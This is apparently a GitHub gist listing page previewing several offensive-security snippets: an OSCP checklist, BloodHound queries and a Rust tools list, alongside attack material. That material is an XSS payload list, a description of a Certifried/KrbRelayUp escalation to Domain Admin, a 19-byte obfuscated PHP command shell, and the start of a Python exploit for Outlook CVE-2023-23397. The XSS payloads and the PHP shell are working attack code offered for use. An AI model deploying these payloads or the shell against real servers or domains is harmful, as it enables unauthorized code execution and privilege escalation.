- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
Cybrly cybrly
unfo
/ how-to-oscp-final.md
Last active
February 26, 2024 08:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.
Because a smart man once said:
Never google twice.
seajaysec
/ cypherqueries.md
Created
September 24, 2019 23:06
custom bloodhound queries for the neo4j console
Cypher Queries
Cypher Queries can be entered into the neo4j console, accessible at http://localhost:7474. These often return text-based content. There's a max of 1000 displayed rows within the console, however each query result can be downloaded as a CSV for more in depth analysis. When pasting, replace all instances of "EXAMPLE.COM" with the domain name that you are operating on. These are from a wide range of sources. A lot of them came or were inspired by discussions on the Bloodhound Slack.
Basic
Generate list of all operating systems
MATCH (c:Computer)
sts10
/ rust-command-line-utilities.markdown
Last active
June 27, 2024 11:24
A curated list of command-line utilities written in Rust
Note: I have moved this list to a proper repository. I'll leave this gist up, but it won't be updated. To submit an idea, open a PR on the repo.
Note that I have not tried all of these personally, and cannot and do not vouch for all of the tools listed here. In most cases, the descriptions here are copied directly from their code repos. Some may have been abandoned. Investigate before installing/using.
The ones I use regularly include: bat, dust, fd, fend, hyperfine, miniserve, ripgrep, just, cargo-audit and cargo-wipe.
tothi
/ certifried_with_krbrelayup.md
Last active
November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
Tw1sm
/ DecryptCreds.exe
Last active
March 25, 2023 02:07
tothi
/ openssl-legacy-md4.md
Last active
September 4, 2023 12:51
/etc/ssl/openssl.cnf supporting legacy digests like MD4 (useful for offensive tools requiring NTLM support)
This is a minimal /etc/ssl/openssl.cnf supporting legacy algorithms on modern openssl installations
where it is disabled by default.
The marked (######) lines should be added to your openssl.cnf (other parts may be unchanged).
For checking if legacy providers are enabled successfully:
$ openssl list -providers
Providers:
0xSojalSec
/ rev_shell.php
Created
January 28, 2023 18:46
— forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |
tothi
/ PidLidReminderPwn.py
Created
March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python -u | |
| from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
| from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
| from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
| BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
OlderNewer